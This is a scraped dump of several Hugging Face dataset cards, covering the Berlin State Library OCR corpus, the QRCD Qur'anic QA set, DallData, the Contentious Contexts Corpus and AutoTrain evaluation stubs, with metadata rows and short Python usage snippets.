0.7962499857,
0.6949999928,
0.8937500119,
0.6299999952,
0.8820000291,
1.0,
0.6781818271,
0.7649999857,
0.437142849,
1.0,
1.0,
0.7416666746,
0.6474999785,
0.8166666627,
0.6825000048,
0.75,
0.7033333182,
0.7599999905,
0.7639999986,
0.7516666651,
1.0,
1.0,
0.5466666818,
0.7571428418,
0.8450000286,
1.0,
0.9350000024,
1.0,
1.0,
0.7099999785,
0.7250000238,
0.8588888645,
0.8366666436,
0.7966666818,
1.0,
0.9066666961,
0.7288888693,
1.0,
0.8333333135,
0.8787500262,
0.6949999928,
0.8849999905,
0.5816666484,
0.5899999738,
0.7922222018,
1.0,
1.0,
0.6657142639,
0.8650000095,
0.7674999833,
0.6000000238,
0.9737499952,
0.8140000105,
0.978333354,
1.0,
0.7799999714,
0.6650000215,
1.0,
0.823333323,
1.0,
0.9599999785,
0.6349999905,
1.0,
0.9599999785,
0.6025000215,
0.8525000215,
0.4875000119,
0.675999999,
0.8833333254,
0.6650000215,
0.7566666603,
0.6200000048,
0.5049999952,
0.4524999857,
1.0,
0.7711111307,
0.6666666865,
0.7128571272,
1.0,
0.8700000048,
0.6728571653,
1.0,
0.6800000072,
0.6499999762,
0.8259999752,
0.7662500143,
0.6725000143,
0.8362500072,
1.0,
0.6600000262,
0.6299999952,
0.6825000048,
0.7220000029,
1.0,
1.0,
0.6587499976,
0.6822222471,
1.0,
0.8339999914,
0.6449999809,
0.7062500119,
0.9150000215,
0.8824999928,
0.6700000167,
0.7250000238,
0.8285714388,
0.5400000215,
1.0,
0.7966666818,
0.7350000143,
0.6188889146,
0.6499999762,
1.0,
0.7459999919,
0.5799999833,
0.7480000257,
1.0,
0.9333333373,
0.790833354,
0.5550000072,
0.6700000167,
0.7766666412,
0.8280000091,
0.7250000238,
0.8669999838,
0.5899999738,
1.0,
0.7562500238,
1.0,
0.7799999714,
0.8500000238,
0.4819999933,
0.9350000024,
1.0,
0.8399999738,
0.7950000167,
1.0,
0.9474999905,
0.453333348,
0.6575000286,
0.9399999976,
0.6733333468,
0.8042857051,
0.7599999905,
1.0,
0.7355555296,
0.6499999762,
0.7118181586,
1.0,
0.621999979,
0.7200000286,
1.0,
0.853333354,
0.6650000215,
0.75,
0.7787500024,
1.0,
0.8840000033,
1.0,
0.851111114,
1.0,
0.9142857194,
1.0,
0.8899999857,
1.0,
0.9024999738,
1.0,
0.6166666746,
0.7533333302,
0.7766666412,
0.6637499928,
1.0,
0.8471428752,
0.7012500167,
0.6600000262,
0.8199999928,
1.0,
0.7766666412,
0.3899999857,
0.7960000038,
0.8050000072,
1.0,
0.8000000119,
0.7620000243,
1.0,
0.7163636088,
0.5699999928,
0.8849999905,
0.6166666746,
0.8799999952,
0.9058333039,
1.0,
0.6866666675,
0.7810000181,
0.3400000036,
0.2599999905,
0.6333333254,
0.6524999738,
0.4875000119,
0.7425000072,
0.75,
0.6863636374,
1.0,
0.8742856979,
0.137500003,
0.2099999934,
0.4199999869,
0.8216666579,
1.0,
0.7563636303,
0.3000000119,
0.8579999804,
0.6679999828,
0.7099999785,
0.7875000238,
0.9499999881,
0.5799999833,
0.9150000215,
0.6600000262,
0.8066666722,
0.729090929,
0.6999999881,
0.7400000095,
0.8066666722,
0.2866666615,
0.6700000167,
0.9225000143,
1.0,
0.7599999905,
0.75,
0.6899999976,
0.3600000143,
0.224999994,
0.5799999833,
0.8874999881,
1.0,
0.8066666722,
0.8985714316,
0.8827272654,
0.8460000157,
0.8880000114,
0.9533333182,
0.7966666818,
0.75,
0.8941666484,
1.0,
0.8450000286,
0.8666666746,
0.9533333182,
0.5883333087,
0.5799999833,
0.6549999714,
0.8600000143,
1.0,
0.7585714459,
0.7114285827,
1.0,
0.8519999981,
0.7250000238,
0.7437499762,
0.6639999747,
0.8939999938,
0.8877778053,
0.7300000191,
1.0,
0.8766666651,
0.8019999862,
0.8928571343,
1.0,
0.853333354,
0.5049999952,
0.5416666865,
0.7963636518,
0.5600000024,
0.8774999976,
0.6299999952,
0.5749999881,
0.8199999928,
0.7766666412,
1.0,
0.9850000143,
0.5674999952,
0.6240000129,
1.0,
0.9485714436,
1.0,
0.8174999952,
0.7919999957,
0.6266666651,
0.7887499928,
0.7825000286,
0.5366666913,
0.65200001,
0.832857132,
0.7488889098]}
```
### Data Fields
- `file name`: filename of the original XML file
- `text`: OCR'd text for that page of the item
- `wc`: the word confidence for each token predicted by the OCR engine
- `ppn`: 'Pica production numbers', an internal ID used by the library. See [this documentation](https://doi.org/10.5281/zenodo.2702544) for more details.
- `language`: language predicted by `langid.py` (see above for more details)
- `language_confidence`: confidence score given by `langid.py`
- `publisher`: publisher of the item in which the text appears
- `place`: place of publication of the item in which the text appears
- `date`: date of the item in which the text appears
- `title`: title of the item in which the text appears
- `aut`: author of the item in which the text appears
[More Information Needed]
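As mentioned under supported tasks, these fields make it possible to filter the corpus before language-model training. A minimal sketch follows; the thresholds are illustrative assumptions, as is the handling of examples with no language match (assumed to carry `None`):

```python
from statistics import mean

from datasets import load_dataset

dataset = load_dataset("biglam/berlin_state_library_ocr", split="train")

def keep(example):
    # keep confidently identified German pages with reasonably clean OCR
    return (
        example["language"] == "de"
        and example["language_confidence"] is not None
        and example["language_confidence"] > 0.95
        and example["wc"]
        and mean(example["wc"]) > 0.8
    )

filtered = dataset.filter(keep)
```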
### Data Splits
This dataset contains only a single split `train`.
## Dataset Creation
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo.
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
The dataset is created from [OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB)](https://doi.org/10.5281/zenodo.3257041) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.
The [dataprep.ipynb](https://huggingface.co/datasets/biglam/berlin_state_library_ocr/blob/main/dataprep.ipynb) notebook was used to create this dataset.
To make the dataset more useful for training language models, the following steps were carried out:
- the CSV `xml2csv_alto.csv`, which contains the full-text corpus per document page (incl. OCR word confidences), was loaded using the `datasets` library
- this CSV was augmented with language information from `corpus-language.pkl`. **Note:** some examples do not have a match for this. Sometimes this is because a page is blank, but some pages with actual text may also be missing predicted language information
- the CSV was further augmented by trying to map the PPN to fields in a metadata download created using [https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py](https://github.com/elektrobohemian/StabiHacks/blob/master/oai-analyzer/oai-analyzer.py). **Note:** not all examples are successfully matched to this metadata download.
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
- the confidence scores produced by the OCR engine when generating the full-text materials.
- the predicted languages and associated confidence scores produced by `langid.py`
The dataset also contains metadata for the following fields:
- author
- publisher
- the place of publication
- title
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
[Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0/legalcode)
### Citation Information
```
@dataset{labusch_kai_2019_3257041,
author = {Labusch, Kai and
Zellhöfer, David},
title = {{OCR fulltexts of the Digital Collections of the
Berlin State Library (DC-SBB)}},
month = jun,
year = 2019,
publisher = {Zenodo},
version = {1.0},
doi = {10.5281/zenodo.3257041},
url = {https://doi.org/10.5281/zenodo.3257041}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) for adding this dataset.
| biglam/berlin_state_library_ocr | [
"task_categories:fill-mask",
"task_categories:text-generation",
"task_ids:masked-language-modeling",
"task_ids:language-modeling",
"annotations_creators:machine-generated",
"language_creators:expert-generated",
"multilinguality:multilingual",
"size_categories:1M<n<10M",
"language:de",
"language:nl",
"language:en",
"language:fr",
"language:es",
"license:cc-by-4.0",
"ocr",
"library",
"region:us"
] | 2022-07-26T18:40:02+00:00 | {"annotations_creators": ["machine-generated"], "language_creators": ["expert-generated"], "language": ["de", "nl", "en", "fr", "es"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["1M<n<10M"], "source_datasets": [], "task_categories": ["fill-mask", "text-generation"], "task_ids": ["masked-language-modeling", "language-modeling"], "pretty_name": "Berlin State Library OCR", "tags": ["ocr", "library"]} | 2022-08-05T08:36:24+00:00 |
88b10b40e3197c83f2995771e057515f584ecd27 |
# Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://sites.google.com/view/quran-qa-2022/home
- **Repository:** https://gitlab.com/bigirqu/quranqa/-/tree/main/
- **Paper:** https://dl.acm.org/doi/10.1145/3400396
- **Leaderboard:**
- **Point of Contact:** @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use the partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only to the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
In contrast, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
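For intuition, here is a minimal sketch of how pRR might be computed for a single question. It assumes a simplified token-overlap F1 as the partial-match function and that the score of the first partially matching answer is discounted by its rank; see the linked paper for the authoritative definition:

```python
def token_f1(prediction: str, gold: str) -> float:
    # simplified token-overlap F1 (set-based, not the exact official matcher)
    pred_tokens, gold_tokens = set(prediction.split()), set(gold.split())
    common = pred_tokens & gold_tokens
    if not common:
        return 0.0
    precision = len(common) / len(pred_tokens)
    recall = len(common) / len(gold_tokens)
    return 2 * precision * recall / (precision + recall)

def partial_reciprocal_rank(ranked_predictions: list, gold_answers: list) -> float:
    # score of the first partially matching answer, discounted by its rank
    for rank, prediction in enumerate(ranked_predictions, start=1):
        score = max(token_f1(prediction, gold) for gold in gold_answers)
        if score > 0:
            return score / rank
    return 0.0
```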
### Languages
Qur'anic Arabic
## Dataset Structure
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
```json
{
"pq_id": "38:41-44_105",
"passage": "واذكر عبدنا أيوب إذ نادى ربه أني مسني الشيطان بنصب وعذاب. اركض برجلك هذا مغتسل بارد وشراب. ووهبنا له أهله ومثلهم معهم رحمة منا وذكرى لأولي الألباب. وخذ بيدك ضغثا فاضرب به ولا تحنث إنا وجدناه صابرا نعم العبد إنه أواب.",
"surah": 38,
"verses": "41-44",
"question": "من هو النبي المعروف بالصبر؟",
"answers": [
{
"text": "أيوب",
"start_char": 12
}
]
}
```
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* `pq_id`: Sample ID
* `passage`: Context text
* `surah`: Surah number
* `verses`: Verse range
* `question`: Question text
* `answers`: List of answers and their start character
### Data Splits
| **Dataset** | **%** | **# Question-Passage Pairs** | **# Question-Passage-Answer Triplets** |
|-------------|:-----:|:-----------------------------:|:---------------------------------------:|
| Training | 65% | 710 | 861 |
| Development | 10% | 109 | 128 |
| Test | 25% | 274 | 348 |
| All | 100% | 1,093 | 1,337 |
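Given these splits, loading the dataset with the `datasets` library might look like the sketch below (assuming the splits are exposed under the usual `train`/`validation`/`test` names):

```python
from datasets import load_dataset

dataset = load_dataset("tarteel-ai/quranqa")
sample = dataset["train"][0]
print(sample["question"], sample["answers"])
```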
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License https://creativecommons.org/licenses/by-nd/4.0/legalcode
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to https://creativecommons.org/licenses/by-nd/4.0/
### Citation Information
```
@article{malhas2020ayatec,
author = {Malhas, Rana and Elsayed, Tamer},
title = {AyaTEC: Building a Reusable Verse-Based Test Collection for Arabic Question Answering on the Holy Qur’an},
year = {2020},
issue_date = {November 2020},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {19},
number = {6},
issn = {2375-4699},
url = {https://doi.org/10.1145/3400396},
doi = {10.1145/3400396},
journal = {ACM Trans. Asian Low-Resour. Lang. Inf. Process.},
month = {oct},
articleno = {78},
numpages = {21},
keywords = {evaluation, Classical Arabic}
}
```
### Contributions
Thanks to [@piraka9011](https://github.com/piraka9011) for adding this dataset.
| tarteel-ai/quranqa | [
"task_categories:question-answering",
"task_ids:extractive-qa",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:n<1K",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"license:cc-by-nd-4.0",
"quran",
"qa",
"region:us"
] | 2022-07-26T19:05:10+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["ar"], "license": ["cc-by-nd-4.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K", "1K<n<10K"], "source_datasets": ["original"], "task_categories": ["question-answering"], "task_ids": ["extractive-qa"], "pretty_name": "Qur'anic Reading Comprehension Dataset", "tags": ["quran", "qa"]} | 2022-07-27T01:28:31+00:00 |
e7d4f3001b1c33740f10caa51c61cd4199e831e0 |
DallData is a non-exhaustive look into the unconditional image generation of DALL-E Mega (1). This dataset is released under the [BirdL-AirL License](https://huggingface.co/spaces/BirdL/license/).
(1)
```bibtex
@misc{Dayma_DALL·E_Mini_2021,
author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata},
doi = {10.5281/zenodo.5146400},
month = {7},
title = {DALL·E Mini},
url = {https://github.com/borisdayma/dalle-mini},
year = {2021}
}
``` | BirdL/DallData | [
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-07-26T19:48:02+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Latent Space Mapping", "tags": []} | 2022-09-28T20:12:02+00:00 |
794edc666ccae9f296d033a99a826a3f41f34385 | # Dataset Card for Contentious Contexts Corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
  - [Data Fields](#data-fields)
  - [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Repository:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Paper:** [N/A]
- **Leaderboard:** [N/A]
- **Point of Contact:** [Jacco van Ossenbruggen](https://github.com/jrvosse)
**Note** One can also find a Datasheet produced by the creators of this dataset as a [PDF document](https://github.com/cultural-ai/ConConCor/blob/main/Dataset/DataSheet.pdf)
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers containing potentially contentious keywords (according to present-day sensibilities). The dataset contains multiple annotations per instance, giving the option to quantify agreement scores for annotations. It can be used to track how words and their meanings have changed over time.
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is `nl`
## Dataset Structure
### Data Instances
```
{
'extract_id': 'H97',
'text': 'en waardoor het eerste doel wordt voorbijgestreefd om voor den 5D5c5Y 5d-5@5j5g5d5e5Z5V5V5c een speciale eigen werkingssfeer te
scheppen.Intusschen is het',
'target': '5D 5c5Y5d-5@5j5g5d5e5Z5V5V5c',
'annotator_responses_english': [
{'id': 'unknown_2a', 'response': 'Not contentious'},
{'id': 'unknown_2b', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2c', 'response': "I don't know"},
{'id': 'unknown_2d', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2e', 'response': 'Not contentious'},
{'id': 'unknown_2f', 'response': "I don't know"},
{'id': 'unknown_2g', 'response': 'Not contentious'}],
'annotator_responses_dutch': [
{'id': 'unknown_2a', 'response': 'Niet omstreden'},
{'id': 'unknown_2b', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2c', 'response': 'Weet ik niet'},
{'id': 'unknown_2d', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2e', 'response': 'Niet omstreden'},
{'id': 'unknown_2f', 'response': 'Weet ik niet'},
{'id': 'unknown_2g', 'response': 'Niet omstreden'}],
'annotator_suggestions': [
{'id': 'unknown_2a', 'suggestion': ''},
{'id': 'unknown_2b', 'suggestion': 'ander ras nodig'},
{'id': 'unknown_2c', 'suggestion': 'personen van ander ras'},
{'id': 'unknown_2d', 'suggestion': ''},
{'id': 'unknown_2e', 'suggestion': ''},
{'id': 'unknown_2f', 'suggestion': ''},
{'id': 'unknown_2g', 'suggestion': 'ras'}]
}
```
### Data Fields
|extract_id|text|target|annotator_responses_english|annotator_responses_dutch|annotator_suggestions|
|---|---|---|---|---|---|
|Unique identifier|Text|Target phrase or word|Response(translated to English)|Response in Dutch|Suggestions, if present|
### Data Splits
Train: 2720
## Dataset Creation
### Curation Rationale
> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
### Source Data
#### Initial Data Collection and Normalization
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
> - 'Omstreden' (Contentious)
> - 'Niet omstreden' (Not contentious)
> - 'Weet ik niet' (I don't know)
> - 'Onleesbare OCR' (Illegible OCR)<br/>
> 2 open fields
> - 'Andere omstreden termen in de context' (Other contentious terms in the context)
> - 'Notities' (Notes)<br/>
and the instructions in the header. The rows were the samples with the highlighted words, the tickboxes for every option, and 2 empty cells for the open questions. The obligatory part of the annotation was to select one of the 4 options for every sample. Finding other contentious terms in the given sample, leaving notes, and answering 4 additional open questions at the end of the task were optional. Based on the received feedback and the answers to the open questions in the pilot study, the following decisions were made regarding the next, experts' annotation stage:
> - The annotation layout was built in Google Forms as a questionnaire instead of the table layout in Google Sheets to make the data collection and analysis faster as the number of participants would increase;
> - The context window of 5 sentences per sample was found optimal;
> - The number of samples per annotator was increased to 50;
> - The option 'Omstreden' (Contentious) was changed to 'Omstreden naar huidige maatstaven' ('Contentious according to current standards') to clarify that annotators should judge contentiousness of the word's use in context from today's perspective;
> - The annotation instruction was edited to clarify 2 points: (1) that annotators while judging contentiousness should take into account not only a bolded word but also the context surrounding it, and (2) if a word seems even slightly contentious to an annotator, they should choose the option 'Omstreden naar huidige maatstaven' (Contentious according to current standards);
> - The non-required field for every sample 'Notities' (Notes) was removed as there was an open question at the end of the annotation, where participants could leave their comments;
> - Another open question was added at the end of the annotation asking how much time it took to complete the annotation.
#### Who are the annotators?
Volunteers and Expert annotators
### Personal and Sensitive Information
[N/A]
## Considerations for Using the Data
## Accessing the annotations
Each example text has multiple annotations. These annotations may not always agree. There are various approaches one could take to calculate agreement, including a majority vote, rating some annotators more highly, or calculating a score based on the 'votes' of annotators. Since there are many ways of doing this, we have not implemented this as part of the dataset loading script.
An example of how one could generate an "OCR quality rating" based on the number of times an annotator labelled an example with `Illegible OCR`:
```python
from collections import Counter

def calculate_ocr_score(example):
    annotator_responses = [response["response"] for response in example["annotator_responses_english"]]
    counts = Counter(annotator_responses)
    # count how often annotators marked the example as unreadable
    bad_ocr_ratings = counts.get("Illegible OCR", 0)
    return round(1 - bad_ocr_ratings / len(annotator_responses), 3)

dataset = dataset.map(lambda example: {"ocr_score": calculate_ocr_score(example)})
```
To take the majority vote (or return a tie) based on whether an example is labelled contentious or not:
```python
from collections import Counter

def most_common_vote(example):
    annotator_responses = [response["response"] for response in example["annotator_responses_english"]]
    counts = Counter(annotator_responses)
    contentious_count = counts.get("Contentious according to current standards", 0)
    not_contentious_count = counts.get("Not contentious", 0)
    if contentious_count > not_contentious_count:
        return "contentious"
    if contentious_count < not_contentious_count:
        return "not_contentious"
    return "tied"
```
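As with the OCR score above, the majority vote can then be attached to every example (the `majority_vote` column name is just an illustrative choice):

```python
dataset = dataset.map(lambda example: {"majority_vote": most_common_vote(example)})
```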
### Social Impact of Dataset
This dataset can be used to see how words change in meaning over time
### Discussion of Biases
> Due to the nature of the project, some examples used in this documentation may be shocking or offensive. They are provided only as an illustration or explanation of the resulting dataset and do not reflect the opinions of the project team or their organisations.
Since this project was explicitly created to help assess bias, it should be used primarily in the context of assessing bias and methods for detecting bias.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
[Cultural AI](https://github.com/cultural-ai)
### Licensing Information
CC-BY
### Citation Information
```
@misc{ContentiousContextsCorpus2021,
author = {Cultural AI},
title = {Contentious Contexts Corpus},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/cultural-ai/ConConCor}},
}
``` | biglam/contentious_contexts | [
"task_categories:text-classification",
"task_ids:sentiment-scoring",
"task_ids:multi-label-classification",
"annotations_creators:expert-generated",
"annotations_creators:crowdsourced",
"language_creators:machine-generated",
"multilinguality:monolingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:nl",
"license:cc-by-2.0",
"newspapers",
"historic",
"dutch",
"problematic",
"ConConCor",
"region:us"
] | 2022-07-26T21:07:48+00:00 | {"annotations_creators": ["expert-generated", "crowdsourced"], "language_creators": ["machine-generated"], "language": ["nl"], "license": ["cc-by-2.0"], "multilinguality": ["monolingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_categories": ["text-classification"], "task_ids": ["sentiment-scoring", "multi-label-classification"], "pretty_name": "Contentious Contexts Corpus", "tags": ["newspapers", "historic", "dutch", "problematic", "ConConCor"]} | 2022-08-01T16:02:11+00:00 |
cde011e595294d34ae7c648fcf788b153e762256 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-9ce97676-11915596 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:53:03+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:35:44+00:00 |
9ed5cb6a383d487c045f685388b32a12a5ad17c6 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9
* Dataset: kmfoda/booksum
* Config: kmfoda--booksum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-kmfoda__booksum-3fbf83bf-11925597 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T00:57:53+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["kmfoda/booksum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-large-pubmed-3k-booksum-16384-WIP9", "metrics": [], "dataset_name": "kmfoda/booksum", "dataset_config": "kmfoda--booksum", "dataset_split": "test", "col_mapping": {"text": "chapter", "target": "summary_text"}}} | 2022-07-28T04:57:02+00:00 |
eb61a0f6ad839a5ba5cd3f33da10732bd79a8d56 | anzorq/kbd-ru | [
"task_categories:translation",
"task_categories:text2text-generation",
"language:kbd",
"language:ru",
"license:mit",
"translation",
"text2text-generation",
"region:us"
] | 2022-07-27T01:07:25+00:00 | {"language": ["kbd", "ru"], "license": "mit", "task_categories": ["translation", "text2text-generation"], "pretty_name": "Circassian (Kabardian) - Russian sentence pairs", "tags": ["translation", "text2text-generation"]} | 2023-07-20T01:34:30+00:00 |
|
7103492b78e16adacd7b2a3216f524265ae3d70c | anzorq/kbd_lat-ru | [
"task_categories:translation",
"task_categories:text2text-generation",
"multilinguality:multilingual",
"source_datasets:original",
"language:kbd",
"language:ru",
"license:mit",
"translation",
"region:us"
] | 2022-07-27T02:27:22+00:00 | {"language": ["kbd", "ru"], "license": ["mit"], "multilinguality": ["multilingual"], "source_datasets": ["original"], "task_categories": ["translation", "text2text-generation"], "task_ids": ["translation", "text2text-generation"], "pretty_name": "Kbd Ru Translation", "tags": ["translation"]} | 2022-07-31T01:04:38+00:00 |
|
0342260156e61cc56a6f59314d0d5b036b985a39 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/led-base-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
